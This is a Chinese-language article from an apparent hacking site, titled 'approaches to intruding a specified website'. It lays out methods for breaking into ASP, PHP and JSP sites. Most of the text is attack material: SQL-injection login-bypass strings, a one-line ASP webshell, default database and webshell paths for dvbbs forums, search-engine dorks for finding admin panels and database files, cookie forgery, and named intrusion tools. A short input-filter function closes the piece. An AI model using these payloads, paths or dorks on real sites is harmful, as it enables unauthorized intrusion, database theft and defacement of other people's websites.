[ 首页 ] [ 渗透测试 ] [ 黑客接单 ] [ 黑客技术 ] [ 黑客论坛 ] [ 黑客松 ]



标题 : 指定网站入侵思路
日期 : 2023-07-10

一个网站首先要看的地方是他的网站类型,只有观察好网站类型你才能更好的应对也才能更好的找到针对的方案。

什么样站点可以入侵:我认为必须是动态的网站 如ASP、PHP、 JSP等代码编写的站

点 如果是静态的(.htm或html),一般是不会成功的。

如果要入侵的目标网站是动态的,就可以利用动态网站的漏洞进行入侵。

以下是入侵网站常用方法:

1.上传漏洞

如果看到:选择你要上传的文件 [重新上传]或者出现“请登陆后使用”,80%就有漏洞了!

有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用

DOMAIN上传. 

2.注入漏洞

字符过滤不严造成的

3.暴库:把二级目录中间的/换成%5c 

4.’or’=’or’这是一个可以连接SQL的语名句.可以直接进入后台。

我收集了一下。类似的还有:

 ’or”=’

 ” or “a”=”a  

  ‘) or (‘a’=’a  

  “) or (“a”=”a  

  or 1=1– 

  ‘ or ‘a’=’a

以上的几种都属于常规手段,也就是网络上的攻击,还有一种搜集情报类的攻击手段我就不详细写了,就是我们的社会工程学。不过搜集情报什么的可是一个辛苦的工作啊.

5.写入ASP格式数据库。就是一句话木马〈%execute request(“value”)%〉 (数据库必需得是ASP或ASA的后缀)

6.源码利用:一些网站用的都是网上下载的源码.有的站长很懒.什么也不改.

比如:默认数据库,默认后台地址,默认管理员帐号密码等

7.默认数据库/webshell路径利用:这样的网站很多/利人别人的WEBSHELL.

/Databackup/dvbbs7.MDB

/bbs/Databackup/dvbbs7.MDB

/bbs/Data/dvbbs7.MDB

/data/dvbbs7.mdb

/bbs/diy.asp

/diy.asp

/bbs/cmd.asp

/bbs/cmd.exe

/bbs/s-u.exe

/bbs/servu.exe

工具:网站猎手 挖掘鸡 明小子

8.查看目录法:一些网站可以断开目录,可以访问目录。

210.37.95.65 images

9.搜索引擎利用:

inurl:flasher_list.asp 

默认数据库:database/flash.mdb 

后台/manager/

找网站的管理后台地址:

site:xxxx.comintext:管理

site:xxxx.comintitle:管理  〈关键字很多,自已找〉

site:xxxx.cominurl:login

查找access的数据库,mssql、mysql的连接文件

allinurl:bbsdata

filetype:mdbinurl:database

filetype:incconn

inurl:datafiletype:mdb

10.COOKIE诈骗:把自己的ID修改成管理员的,MD5密码也修改成他的,用桂林老兵工具可以修改

COOKIE。

11.利用常见的漏洞:如动网BBS

可以先用:dvbbs权限提升工具,使自已成为前台管理员。

THEN,运用:动网固顶贴工具,找个固顶贴,再取得COOKIES,这个要你自已做。我们可以用

WSockExpert取得Cookies/NC包

这个我就不做了,网上教程多的是,自已下个看看。

工具:dvbbs权限提升工具  动网固顶贴工具

12.还有一些老漏洞。如IIS3,4的查看源码,

5的Delete CGI,PHP的一些老洞,我就不说了啊。。太老了。没有什么大用途。

  这里再介绍一种方式就是简单的脚本入侵,脚本入侵也是一种耗脑子的骚操作啊

 简单的脚本攻击 

  此类攻击是由于WEB程序编写上对特殊字符过滤不严密所造成的,虽说不能对服务器的安全

造成严重威胁,可是却可以使入侵者发布含有HTML语句的恶意代码,扰乱网站秩序,从而对网站

产生不良影响。下面给大家举个例子:某网站在进行用户注册时,没有对特殊字符进行过滤,就

有可能被无聊者利用,假设论坛的管理员ID为:webmaster,那就有可能有人在注册用户名时注册

成 webmaster ,尽管ID有区别,可是在页面显示却是一样的,如果无聊者把其他的信息改的和

webmaster一样,那别人就很难区分这两个ID哪个是真的哪个是假的。有不少网站有自己开发的

留言板,而且支持提交HTML留言,这就给破坏者提供了机会,他们可以写一个自动弹出窗口并打

开一个带木马的网页的代码,这样别人在浏览这条留言时就有可能被种下木马。防范方法很简单

,加个过滤函数就可以了: 

  〈% 

  function SqlCheck(fString) 

   fString = Replace(fString, “‘”,””) 

   fString = Replace(fString, ” “,””) 

   fString = Replace(fString, “;”,””) 

   fString = Replace(fString, “–“,””) 

   fString = Replace(fString, “,”,””) 

   fString = Replace(fString, “(“,””) 

   fString = Replace(fString, “)”,””) 

   fString = Replace(fString, “=”,””) 

   fString = Replace(fString, “%”,””) 

   fString = Replace(fString, “*”,””) 

   fString = Replace(fString, “<“,””) 

   fString = Replace(fString, “>”,””) 

   SqlCheck = fString 

  end function 

  %〉 

  以上过滤函数中的String = Replace(fString, “<“,””) fString = Replace(fString,

“>”,””)可以去掉语句中的“<”和“>”符号,使HTML代码无法运行。